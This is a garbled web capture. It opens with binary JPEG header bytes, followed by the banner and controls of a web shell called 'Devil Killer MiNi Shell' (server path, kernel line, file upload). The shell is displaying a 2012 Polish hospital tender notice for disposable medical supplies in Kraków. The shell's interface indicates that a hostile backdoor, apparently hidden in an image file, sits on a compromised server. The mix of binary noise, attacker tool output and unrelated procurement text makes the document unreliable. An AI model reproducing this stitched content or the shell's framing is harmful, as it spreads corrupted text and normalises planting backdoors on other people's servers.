JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120625/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120625/136917-N-2012.html

<p class="kh_header"><b>Kraków: DOSTAWY MATERIAŁÓW MEDYCZNYCH JEDNORAZOWEGO UŻYTKU</b><br>
<b>Numer ogłoszenia: 136917 - 2012; data zamieszczenia: 25.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 5 Wojskowy Szpital Kliniczny z Polikliniką Samodzielny Publiczny ZOZ , ul. Wrocławska 1-3, 30-901 Kraków, woj. małopolskie, tel. 12 63 08 099, faks 12 63 08 099.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.5wszk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWY MATERIAŁÓW MEDYCZNYCH JEDNORAZOWEGO UŻYTKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PAKIET1 Rękawice nitrylowe
L.p	NAZWA MATERIAŁU	Kod CPV	j.m	Ilość	Cena jednostkowa netto	Wart. Netto	Stawka VAT	Wart. brutto	Nazwa handlowa/ nr katalogowy
1.	Rękawice nitrylowe  AQL 1,0-1,5, oznakowane jako wyrób medyczny i środek ochrony osobistej,  posiadające certyfikat przydatności do kontaktu z żywnością. Mikroteksturowane .Opakowanie  a 100 szt	33141420-0	op	2500					
	Razem								
PAKIET 2 Rękawice winylowe
L.p	 NAZWA MATERIAŁU	Kod CPV	j.m	Ilość	Cena jednostkowa netto	Wart. Netto	Stawka VAT	Wart. brutto	Nazwa handlowa/ nr katalogowy
1.	Rękawice L,M,S x 100 szt winylowe . długość min 240 mm, rozmiar do wyboru przez zamawiającego, bezpudrowe	33141420-0	op.	1200					
	Razem								
Pakiet  3 szkiełka
L.p	 NAZWA MATERIAŁU	Kod CPV	j.m	Ilość	Cena jednostkowa netto	Wart. Netto	Stawka VAT	Wart. brutto	Nazwa handlowa/ nr katalogowy
1	Szkiełka nakrywkowe 18x18 x 100 szt.	33141000-0	op.	300					
2	Szkiełka nakrywkowe 24x40 x 100 szt.	33141000-0	op.	100					
3	Szkiełka nakrywkowe 24x50 x 100 szt.	33141000-0	op.	50					
4	Szkiełka nakrywkowe 24x 60 x 100 szt.	33141000-0	op.	100					
5	Szkiełka podst.1,1 szlif. matowe x 50 szt.	33141000-0	op.	200					
6	Szkiełka S-Frost Plus x 50 szt.	33141000-0	op.	5					
7	Szkiełka do Intry i kości.x 100szt.	33141000-0	op.	30					
	Razem								
Pakiet 4 Cewniki
L.p	NAZWA MATERIAŁU	Kod CPV	j.m	Ilość	Cena jednostkowa netto	Wart. Netto	Stawka VAT	Wart. brutto	Nazwa handlowa/ nr katalogowy
1	Cew. do ods. gór. dr. odd. CH10-CH 20 dł. min 450mm	33141200-2	szt.	6000					
2	 Cew. do pod. tl. przez nos min.150 cm	33141200-2	szt.	1200					
3	Kanka DOODB. 24mm x 25cm z końcówką 	33141200-2	szt.	300					
4	Kanka DOODB. 30mm x 40cm z końcówką 	33141200-2	szt.	300					
5	Zatyczki do cewn. pakowane pojedynczo, sterylne, schodkowe z motylkowym uchwytem x 100 szt	33141000-3	op.	10					
6	Cewnik FOLEY 12CH-CH24, pojemność balonu max 45 ML, wykonane z lateksu obustronnie silikonowanego, podwójne opakowanie: wewnętrzne foliowe, zewnętrzne papier-folia, oznaczenie rozmiaru i pojemności balonu na cewniku, rozmiar w zależności od zapotrzebowania	33141641-5	szt.	1200					
7	Worek na mocz z odpł. min. 2 L (max 2,5L) z podziałką jałowy	33141000-0	szt.	1200					
8	Rękawice foliowe x 100 szt.(męskie,żeńskie)	33141000-3	op.	100					
	Razem								
Pakiet 5 dren Redon
L.p	 NAZWA MATERIAŁU	Kod CPV	j.m	Ilość	Cena jednostkowa netto	Wart. Netto	Stawka VAT	Wart. brutto	Nazwa handlowa/ nr katalogowy
1	Dren Redon Ch16 o długości 70 cm posiadający 7otworów bocznych pakowany wyłącznie prosto( nie może być zagięty, zwinięty)	33141640-8	Szt.	200					
	Razem								
Pakiet 6 dreny Ulmera 
L.p	 NAZWA MATERIAŁU	Kod CPV	j.m	Ilość	Cena jednostkowa netto	Wart. Netto	Stawka VAT	Wart. brutto	Nazwa handlowa/ nr katalogowy
1	Dren do ran typ Ulmera ster. Od 10 CH/75 do  18 CH /75	33141640-8	 Szt.	400					
2	Dren do ran typ Ulmera ster. ze stalowym trocarem od 14Ch/75 perf. do 16Ch/75 na dł.12cm	33141640-8	 Szt.	50					
	Razem								
Pakiet 7 System aspiracyjno-próżniowego pobierania krwi
L.p	 NAZWA MATERIAŁU	Kod CPV	j.m	Ilość	Cena jednostkowa netto	Wart. Netto	Stawka VAT	Wart. brutto	Nazwa handlowa/ nr katalogowy
1	Probówko-strzykawka do oznacznia morfologii z EDTA  wys. ok. 65 mm i szer.13 mm o poj 2-3ml dostowane do automatycznego podajnika w analizatorze hematologicznym Sysmex XT 2000i	33124110-9	szt.	45000					
2	Probówko-strzykawka koagulologiczna z 3,2 % cytrynianem sodu o szer. 9-11,5 mm i wysok. ok..66 mm o poj. 2-3 ml. dostosowane do analizatora koagulologicznego Sysmex Ca 560	33124110-9	szt.	23000					
3	Probówko-strzykawka do oznacznia biochemii z aktywatorem wykrzepiania -granulat o poj. 1,2 ml , dostosowane do analizatorów Konelab , Advia Centaur	33124110-9	szt.	300					
4	Probówko-strzykawka do oznacznia biochemii z aktywatorem wykrzepiania -granulat o poj. 4-5 ml , szer. 13 mm i  wys. ok.90 mm dostosowane do analizatorów Konelab , Advia Centaur XP	33124110-9	szt.	60000					
5	Probówko-strzykawka do OB z 3,8% cytrynianem sodu do automatycznego odczytu o wys ok.130mm i szer 8-8,5 mm poj. 3-4 ml+ czytnik do probówek jako bezpłatne użyczenie na czas trwania umowy.	33124110-9	szt.	9000					
6	Probówki do koagulologii z 3,2% cytrynianem sodu -pediatryczne o poj. 1,2 do 1,6ml 	33124110-9	szt.	200					
7	Probówki do oznacznia morfologii z EDTA - pediatryczne o poj. 1ml do 1,4 ml  wys. ok..66mm i śr. 8 mm lub 11,5mm dostowane do automatycznego podajnika w analizatorze hematologicznym Sysmex XT 2000i	33124110-9	szt.	400					
8	Probówki do separacji surowicy 9ml-10ml z granulatem przeznaczone dla celów krwiodawstwa	33124110-9	szt.	9000					
9	Igła systemowa 0,7/38 mm 22G, 0,8/38 mm 21G,0,9/38 mm 20G, 0,8x 25 mm(krótka),rozmiar do wyboru przy zamówieniu	33124110-9	szt.	55000					
10	Adaptery umożliwiające pobranie krwi z venflonu 	33124110-9	szt.	7000					
	Razem								
Wszystkie próbki powinny posiadać etykiety.
Wszystkie pozycje od jednego producenta
Pakiet 8 Kraniki i koreczki
L.p	 NAZWA MATERIAŁU	Kod CPV	j.m	Ilość	Cena jednostkowa netto	Wart. Netto	Stawka VAT	Wart. brutto	Nazwa handlowa/ nr katalogowy
1	Przyrząd do pobierania i wstrzykiwania leków z butelek z filtrem bakteryjnym 0,45 ?m i zatyczką	33140000-3	szt.	500					
2	Kranik trójdrożny z wyczuwalnym i optycznym indykatorem położenia kranika otwarty/zamknięty	33140000-3	szt.	800					
3	Kranik trójdrożny z wyczuwalnym i optycznym indykatorem położenia kranika otwarty/zamknięty z przedłużeniem 25 cm	33140000-3	szt.	250					
4	Kranik trójdrożny z wyczuwalnym i optyvcznym  indykatorem położenia kranika otwarty/zamknięty z przedłużeniem 50 cm	33140000-3	szt.	500					
5	Koreczek LOCK	33140000-3	szt.	6000					
6	System 3-ch kraników trójdrożnych z przedłużeniem min 140 cm	33140000-3	szt.	80					
7	System 5-ciu kraników trójdrożnych z przedłużeniem min 140 cm	33140000-3	szt.	80					
8	Igła do blokad 0,6mm x 60mm   23 G x 2 2/5 x 100 szt.	33141320-9	op.	5					
9	Zestaw kroplówkowy do pomp infuzyjnych firmy B.Braun,infusomat długość 145 cm	33140000-3	szt.	100					
	Razem								
Pakiet 9 Strzykawki 
L.p	 NAZWA MATERIAŁU	Kod CPV	j.m	Ilość	Cena jednostkowa netto	Wart. Netto	Stawka VAT	Wart. brutto	Nazwa handlowa/ nr katalogowy
1	Strzyk. ins. 1ML z igłą x 100szt.	33141310-6	op	4					
2	Strzykawka j.u. 2ML, czytelna niezmazywalna skala, kryza ograniczająca wysuwanie się tłoka, opakowanie jednostkowe typu blister - pack x 100szt.	33141310-6	op	150					
3	Strzykawka j.u. 5ML, czytelna niezmazywalna skala, kryza ograniczająca wysuwanie się tłoka, opakowanie jednostkowe typu blister - pack x 100szt.	33141310-6	op	250					
4	Strzykawka j.u. 10ML, czytelna niezmazywalna skala, kryza ograniczająca wysuwanie się tłoka, opakowanie jednostkowe typu blister - pack x 100szt	33141310-6	op	250					
5	Strzykawka j.u. 20ML, czytelna niezmazywalna skala, kryza ograniczająca wysuwanie się tłoka, opakowanie jednostkowe typu blister - pack x 100szt.	33141310-6	op	350					
6	Strzykawka JANET j.u. 100 ML z łącznikiem typu LUER	33141310-6	szt.	1500					
7	Strzykawka tuberkulinowa x 100szt. z igła	33141310-6	op	6					
	Razem								
Pakiet 10 Igły
L.p	 NAZWA MATERIAŁU	Kod CPV	j.m	Ilość	Cena jednostkowa netto	Wart. Netto	Stawka VAT	Wart. brutto	Nazwa handlowa/ nr katalogowy
1	Igły inj. j.u. 0,45x 16mm x 100 szt.	33141320-9	op	100					
2	Igły inj. j.u. 0,5x25 mm x 100 szt.	33141320-9	op	100					
3	Igły inj. j.u. 0,6x30 mm x 100 szt.	33141320-9	op	100					
4	Igły inj. j.u. 0,7x30 mm x 100 szt.	33141320-9	op	200					
5	Igły inj. j.u. 0,8x40 mm x 100 szt.	33141320-9	op	300					
6	Igły inj. j.u. 0,9x40 mm x 100 szt.	33141320-9	op	100					
7	Igły inj. j.u. 1,1x40 mm x 100 szt.	33141320-9	op	100					
8	Igły inj. j.u. 1,2x40 mm x 100 szt.	33141320-9	op	400					
	Razem								
Pakiet 11 przyrządy do przetaczania płynów
L.p	 NAZWA MATERIAŁU	Kod CPV	j.m	Ilość	Cena jednostkowa netto	Wart. Netto	Stawka VAT	Wart. Brutto	Nazwa handlowa/ nr katalogowy
1	Przyrząd do przet. Krwi TS - komora kroplowa ok..10 cm	33194000-6	szt.	4000					
2	Przyrząd do przet. Płynów - komora kroplowa ok. 6 cm	33194000-6	szt.	12000					
	Razem								
Pakiet 12 kaniula 
L.p	 NAZWA MATERIAŁU	Kod CPV	j.m	Ilość	Cena jednostkowa netto	Wart. Netto	Stawka VAT	Wart. Brutto	Nazwa handlowa/ nr katalogowy
1	Kaniula dożylna wykonana z poliuretanu z min 4 paskami kontrastującymi ,dodatkowym portem i możliwością zastosowania mandrynów.       
Rozmiary : 0,9; 1,1; 1,3; 1,5; 1,7 	33141220-8
	szt	11000					
	Razem								
Pakiet 13 rurki 
L.p	 NAZWA MATERIAŁU	Kod CPV	j.m	Ilość	Cena jednostkowa netto	Wart. Netto	Stawka VAT	Wart. Brutto	Nazwa handlowa/ nr katalogowy
1	Rurka intubacyjna z mankietem  pokryta substancją zwiększającą poślizg (silikonowana ) lub wykonana z materiału o zwiększonym poślizgu typu Satin Soft,z zaznaczonym rozmiarem na baloniku kontrolnym, ze znacznikiem głębokości ,sterylna ,pojedynczo pakowana rozmiar do wyboru przez zamawiającego	33141000-0	szt.	500					
2	Rurka tracheostomijna z mankietem  wykonana z miękkiego PCV, silikonowana, sterylna,z prowadnicą ułatwiającą wprowadzenie( dopuszcza się ruchomą ramkę z bezstopniową regulacją ),  pojedynczo pakowana ,rozmiar do wyboru przez zamawiającego. W komplecie 2 tasiemki mocujące bawełniane.	33141000-0	szt.	150					
3	Prowadnica  do rurek intubacyjnych 	33141000-3	szt.	5					
4	Rurka intubacyjna  zbrojona z mankietem   rozmiar do wyboru przez zamawiającego ,sterylna ,pokryta substancją zwiększającą poślizg (silikonowana )lub  wykonana z materiału o poślizgu typu Satin Soft ,z zaznaczonym rozmiarem na baloniku kontrolnym,ze znacznikiem głębokości pojedynczo pakowana rozmiar do wyboru przez zamawiającego	33141000-0	szt.	150					
	Razem.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony FORMULARZ OFERTOWY - według ZAŁĄCZNIKA NR 2 do SIWZ.
2.	Wypełniony we wskazanych miejscach - FORMULARZ CENOWY - OPIS PRZEDMIOTU ZAMÓWIENIA - według ZAŁĄCZNIKA NR 1 do SIWZ.
3.	Pełnomocnictwo umocowujące przynajmniej w zakresie podpisania oferty w postępowaniu 
o udzielenie zamówienia publicznego, dołączone do oferty, o ile nie wynika z innych dokumentów, załączonych przez Wykonawcę.
4.	Oświadczenie Wykonawcy, w trybie art. 44 ustawy, dotyczące spełnienia warunków udziału w postępowaniu, zgodnie z art. 22 ustawy, ściśle według formularza stanowiącego ZAŁĄCZNIK NR 3 do SIWZ, a także ZAŁĄCZNIK NR 3A i co za tym idzie pisemne celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (o ile dotyczy).
5.	Oświadczenie Wykonawcy dotyczące niepodlegania wykluczeniu ściśle według formularza stanowiącego ZAŁĄCZNIKIEM NR 4 do SIWZ.
6.	Aktualny odpis z właściwego rejestru w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, jeżeli odrębne przepisy wymagają wpisu do rejestru.
7.	Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt  6 składa odpowiedni dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości - dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
8.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 7, zastępuje się je dokumentem zawierającym oświadczenie Wykonawcy złożone przed notariuszem, właściwym organem sądowym, administracyjnym, albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - w zakresie dat wystawienia dokumentów, przepisy punktu 7 stosuje się odpowiednio.
9.	Wykonawca zobowiązany złożyć wraz z ofertą na pakiety, 1, 2, 4, 7, 8, 9. 11, 12, 13  próbki zaoferowanych produktów (w jednym, z podanych rozmiarów) , w celu dokonania oceny zgodności zaoferowanego przedmiotu zamówienia z wymaganiami określonymi przez Zamawiającego w SIWZ. Zwrot próbek nastąpi na wniosek Wykonawcy w siedzibie Zamawiającego. Wymagana ilość próbek: 
Pakiet nr 1
Poz. 1 - 1 op. rozmiar M 
Pakiet nr 2
Poz. 1 - 1 op. rozmiar M 
Pakiet nr 4
Poz. 1 - 10 szt.  CH 16
Pakiet nr 7
Poz. 1 - 10 szt.
Poz. 4 - 10 szt. 
Poz. 9 - 20 szt.
Pakiet nr 8
Poz. 7 - 3 szt.
Pakiet nr 9
Poz. 4 - 10 szt.
Poz. 5 - 10 szt.  
Pakiet nr 11
Poz. 1 - 5 szt.
Poz. 2 - 5 szt.
Pakiet nr 12
Poz. 1 - 5 szt. rozmiar 1,3 
Pakiet nr 13:
Poz. 1 -  5 szt. CH 8
Poz. 4 - 2 szt. CH 9 
10. Wykaz próbek według formularza stanowiącego ZAŁĄCZNIK NR 6 do SIWZ - jeśli dotyczy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Kupujący przewiduje możliwość zmiany umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Sprzedający, jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Kupującego, a także dotyczą:
wydłużenia terminu wykonania umowy z powodu okoliczności niezależnych od Sprzedającego,
zmian organizacyjnych Kupującego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe,
zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Kupującego powodujących iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia,
omyłek pisarskich lub błędów rachunkowych,
mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami,
jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego
innych zmian korzystnych dla Kupującego, w tym polegających na zamianie elementów zamówienia na elementy o lepszych lub/i odpowiedniejszych parametrach technicznych chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.5wszk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 5 Wojskowy Szpital Kliniczny z Polikliniką - Samodzielny Publiczny Zakład Opieki Zdrowotnej 30 - 901 Kraków, ul. Wrocławska 1-3..</p>
